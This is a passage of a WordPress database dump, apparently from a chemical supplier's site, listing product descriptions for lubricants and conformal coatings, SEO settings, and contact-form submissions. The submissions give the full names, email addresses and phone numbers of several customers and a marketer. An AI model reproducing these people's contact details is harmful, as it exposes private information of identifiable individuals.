center;">g/cm^-3</td>\r\n<td style="text-align: center;">1.6</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Vapor Pressure</td>\r\n<td style="text-align: center;">hPa</td>\r\n<td style="text-align: center;" width="206">248 at 20 °C (68 °F)\r\n313 at 25 °C (77 °F)\r\n854 at 50 °C (122 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Handling Instructions</strong>\r\n\r\nPlease refer to the Safety Data Sheet (SDS) prior to using and handling Krytox KS 1220 functional polymer. When handling Krytox KS 1220, work in a well-ventilated area to avoid inhalation hazards. Wear safety glasses and nitrile gloves to avoid unintended exposure. Krytox KS 1220 is moisture-sensitive; therefore, appropriate methods should be used to ensure the sustained reactivity of the material. If an open bottle is to be reused, re-introducing a nitrogen blanket and refrigeration will prolong the shelf life.\r\n\r\n<strong>Packaging</strong>\r\n\r\nKytox KS 1220 functional polymer is offered as a 20% solution in Vertrel XF fluorosolvent and available in either 100- or 500-g (0.22- or 1.1-lb) amber glass bottles. The product is packaged under nitrogen, and refrigerated storage is recommended.\r\n\r\n<img class="alignnone wp-image-2462" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/ks-1220-beads-800x309.jpg" alt="ks-1220-beads" width="652" height="252" />\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">To learn more about which Krytox product is right for you, please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">Krytox Frequently Asked Questions (FAQ)</a>'); 
INSERT INTO `wp_postmeta` VALUES (22913, 2460, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (22914, 2460, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22915, 2460, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22916, 2460, '_yoast_wpseo_focuskw_text_input', 'Krytox KS 1220'); 
INSERT INTO `wp_postmeta` VALUES (22917, 2460, '_yoast_wpseo_focuskw', 'Krytox KS 1220'); 
INSERT INTO `wp_postmeta` VALUES (22918, 2460, '_yoast_wpseo_title', 'Krytox KS 1220 Functional Polymers | Anti-Smudge | Anti-Fouling'); 
INSERT INTO `wp_postmeta` VALUES (22919, 2460, '_yoast_wpseo_metadesc', 'Krytox KS 1220 takes advantage of the technology behind Krytox™ performance lubricants to impart anti-smudge, antifouling, to a variety of surfaces.'); 
INSERT INTO `wp_postmeta` VALUES (22920, 2460, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22921, 2460, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22922, 2460, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22923, 1431, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22924, 1431, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22925, 1431, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22926, 1431, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22927, 1431, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22932, 2467, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22933, 2467, '_seq_num', '43'); 
INSERT INTO `wp_postmeta` VALUES (22934, 2467, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22935, 2467, '_field_1', 'Rita Macias'); 
INSERT INTO `wp_postmeta` VALUES (22936, 2467, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (22937, 2467, '_field_2', 'ritamacias.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (22938, 2467, '_field_8', '(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (22939, 2467, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nRita R. Macias\r\nDigital Marketing Manager\r\nsmartertactics.com\r\n(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (22940, 2467, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22941, 2467, '_sub_id', '2467'); 
INSERT INTO `wp_postmeta` VALUES (22944, 2469, '_edit_lock', '1476122374:2'); 
INSERT INTO `wp_postmeta` VALUES (22945, 2469, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22946, 2470, '_edit_lock', '1476122452:2'); 
INSERT INTO `wp_postmeta` VALUES (22947, 2470, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22948, 2471, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22949, 2471, '_seq_num', '40'); 
INSERT INTO `wp_postmeta` VALUES (22950, 2471, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22951, 2471, '_field_12', 'Eric Hudak'); 
INSERT INTO `wp_postmeta` VALUES (22952, 2471, '_field_13', 'Advanced Bionics'); 
INSERT INTO `wp_postmeta` VALUES (22953, 2471, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22954, 2471, '_field_14', 'eric.hudak@advancedbionics.com'); 
INSERT INTO `wp_postmeta` VALUES (22955, 2471, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (22956, 2471, '_field_16', 'Please send an SDS for MS-122AD.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (22957, 2471, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22958, 2471, '_sub_id', '2471'); 
INSERT INTO `wp_postmeta` VALUES (22959, 2472, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22960, 2472, '_seq_num', '41'); 
INSERT INTO `wp_postmeta` VALUES (22961, 2472, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22962, 2472, '_field_12', 'Tereasa Williams'); 
INSERT INTO `wp_postmeta` VALUES (22963, 2472, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (22964, 2472, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22965, 2472, '_field_14', 'tereasa.g.williams@tektronix.com'); 
INSERT INTO `wp_postmeta` VALUES (22966, 2472, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (22967, 2472, '_field_16', 'Please send me a SDS for your ODC-Free Contact Re-Nu.  Thanks'); 
INSERT INTO `wp_postmeta` VALUES (22968, 2472, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22969, 2472, '_sub_id', '2472'); 
INSERT INTO `wp_postmeta` VALUES (22970, 2473, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22971, 2473, '_seq_num', '42'); 
INSERT INTO `wp_postmeta` VALUES (22972, 2473, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22973, 2473, '_field_12', 'Colleen Rood'); 
INSERT INTO `wp_postmeta` VALUES (22974, 2473, '_field_13', 'Dymax Corporation'); 
INSERT INTO `wp_postmeta` VALUES (22975, 2473, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22976, 2473, '_field_14', 'crood@dymax.com'); 
INSERT INTO `wp_postmeta` VALUES (22977, 2473, '_field_15', '(860) 482-1010'); 
INSERT INTO `wp_postmeta` VALUES (22978, 2473, '_field_16', 'Can you please send me an SDS for Dry Lubricant PTFE Released.  We use your product and was just updating information and noticed we have an MSDS on file.  I am in the Environmental Health and Safety Department and we are updating all SDS&#039;s within our company.  Thank you in advance for your assistance.'); 
INSERT INTO `wp_postmeta` VALUES (22979, 2473, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22980, 2473, '_sub_id', '2473'); 
INSERT INTO `wp_postmeta` VALUES (22981, 2474, '_edit_lock', '1502319484:2'); 
INSERT INTO `wp_postmeta` VALUES (22982, 2474, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22983, 2475, '_wp_attached_file', '2016/10/shutterstock_72593680.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22984, 2475, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3768;s:6:"height";i:2820;s:4:"file";s:33:"2016/10/shutterstock_72593680.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_72593680-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_72593680-800x599.jpg";s:5:"width";i:800;s:6:"height";i:599;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_72593680-768x575.jpg";s:5:"width";i:768;s:6:"height";i:575;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_72593680-1600x1197.jpg";s:5:"width";i:1600;s:6:"height";i:1197;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_72593680-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_72593680-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_72593680-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_72593680-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22985, 2475, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22986, 2474, '_thumbnail_id', '2475'); 
INSERT INTO `wp_postmeta` VALUES (22987, 2474, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22988, 2474, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22989, 2474, '_yoast_wpseo_focuskw_text_input', 'Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (22990, 2474, '_yoast_wpseo_focuskw', 'Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (22991, 2474, '_yoast_wpseo_title', 'Conformal Coatings | Selecting the Right Coating | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (22992, 2474, '_yoast_wpseo_metadesc', 'A Conformal Coatings job as a specialized polymeric film designed to insulate, protect and shield printed circuit boards (PCB) and electrical components.'); 
INSERT INTO `wp_postmeta` VALUES (22993, 2474, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22994, 2474, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22995, 2474, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (22996, 2477, '_wp_attached_file', '2016/10/Coating_-_ge_033.tif.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22997, 2477, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:480;s:4:"file";s:32:"2016/10/Coating_-_ge_033.tif.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Coating_-_ge_033.tif-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Coating_-_ge_033.tif-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Coating_-_ge_033.tif-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Coating_-_ge_033.tif-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22998, 2477, '_wp_attachment_image_alt', 'conformal coating'); 
INSERT INTO `wp_postmeta` VALUES (23001, 2474, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (23002, 2474, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (23009, 2474, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23011, 2474, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (23015, 1758, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23016, 2493, '_wp_attached_file', '2016/08/MS-475C_477C-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (23017, 621, '_wp_old_slug', 'ms-475c'); 
INSERT INTO `wp_postmeta` VALUES (23018, 621, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23019, 621, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23020, 621, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23021, 621, '_yoast_wpseo_focuskw_text_input', 'Acrylic Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23022, 621, '_yoast_wpseo_focuskw', 'Acrylic Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23023, 621, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23024, 621, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-475C","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23025, 621, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23027, 637, '_wp_old_slug', 'ms-477c'); 
INSERT INTO `wp_postmeta` VALUES (23028, 637, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23029, 637, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23030, 637, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23031, 637, '_yoast_wpseo_focuskw_text_input', 'MS-477C'); 
INSERT INTO `wp_postmeta` VALUES (23032, 637, '_yoast_wpseo_focuskw', 'Acrylic Conformal Coating MIL-SPEC'); 
INSERT INTO `wp_postmeta` VALUES (23033, 637, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23034, 637, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-477C","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23035, 1759, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23036, 637, '_wp_old_slug', 'acrylic-conformal-coating'); 
INSERT INTO `wp_postmeta` VALUES (23037, 637, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23038, 637, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23039, 637, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23040, 637, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23041, 637, '_ywtm_content_tab_description', 'Miller-Stepheson Acrylic Conformal Coatings offer superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>'); 
INSERT INTO `wp_postmeta` VALUES (23042, 637, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23043, 2496, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23044, 2496, '_seq_num', '44'); 
INSERT INTO `wp_postmeta` VALUES (23045, 2496, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23046, 2496, '_field_1', 'Frank Cecilia'); 
INSERT INTO `wp_postmeta` VALUES (23047, 2496, '_field_10', 'Alpha Wings, LLC'); 
INSERT INTO `wp_postmeta` VALUES (23048, 2496, '_field_2', 'fcecilia@alphawings.com'); 
INSERT INTO `wp_postmeta` VALUES (23049, 2496, '_field_8', '(561) 373-9089'); 
INSERT INTO `wp_postmeta` VALUES (23050, 2496, '_field_3', 'We use MS260 to clean the interior of our aircraft.  These aircraft operate overseas extensively.  I am looking to see if this is available oversease in Dubai as one of our aircraft will be there in a week or so and that would be an ideal time to load 3 cases on board.  Are there any distributors in that area?\r\nThank you.\r\n\r\nFrank Cecilia\r\nDirector of Maintenance'); 
INSERT INTO `wp_postmeta` VALUES (23051, 2496, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23052, 2496, '_sub_id', '2496'); 
INSERT INTO `wp_postmeta` VALUES (23053, 1752, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23054, 733, '_wp_old_slug', 'ms-465c'); 
INSERT INTO `wp_postmeta` VALUES (23055, 733, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23056, 733, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23057, 733, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23058, 733, '_yoast_wpseo_focuskw_text_input', 'Acrylic Conformal'); 
INSERT INTO `wp_postmeta` VALUES (23059, 733, '_yoast_wpseo_focuskw', 'Acrylic Conformal'); 
INSERT INTO `wp_postmeta` VALUES (23060, 733, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23061, 733, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-465","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (23062, 733, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23063, 733, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23064, 733, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23065, 733, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23066, 733, '_ywtm_content_tab_description', 'Miller-Stephenson\'s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>'); 
INSERT INTO `wp_postmeta` VALUES (23067, 733, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (23068, 1753, '_wp_attachment_image_alt', 'Acrylic Coating'); 
INSERT INTO `wp_postmeta` VALUES (23069, 734, '_wp_old_slug', 'ms-467c'); 
INSERT INTO `wp_postmeta` VALUES (23070, 734, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23071, 734, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23072, 734, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23073, 734, '_yoast_wpseo_focuskw_text_input', 'Acrylic Coating'); 
INSERT INTO `wp_postmeta` VALUES (23074, 734, '_yoast_wpseo_focuskw', 'Acrylic Coating'); 
INSERT INTO `wp_postmeta` VALUES (23075, 734, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23076, 734, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23082, 734, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23083, 734, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23084, 734, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23085, 734, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23086, 734, '_ywtm_content_tab_description', 'Miller-Stephenson’s Acrylic Coating is a non-flammable, tough, fast drying, abrasion resistant conformal coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>'); 
INSERT INTO `wp_postmeta` VALUES (23087, 734, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23088, 638, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23089, 638, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23090, 638, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23091, 638, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23092, 638, '_ywtm_content_tab_description', 'Krytox 240AZ grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the re-certification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nApplications for Krytox 240AZ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AZ grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.'); 
INSERT INTO `wp_postmeta` VALUES (23093, 2503, '_edit_lock', '1476301527:2'); 
INSERT INTO `wp_postmeta` VALUES (23094, 2503, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (23095, 2504, '_wp_attached_file', '2016/10/automotive-bearing-lubrication.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23096, 2504, '_wp_attachment_metadata', 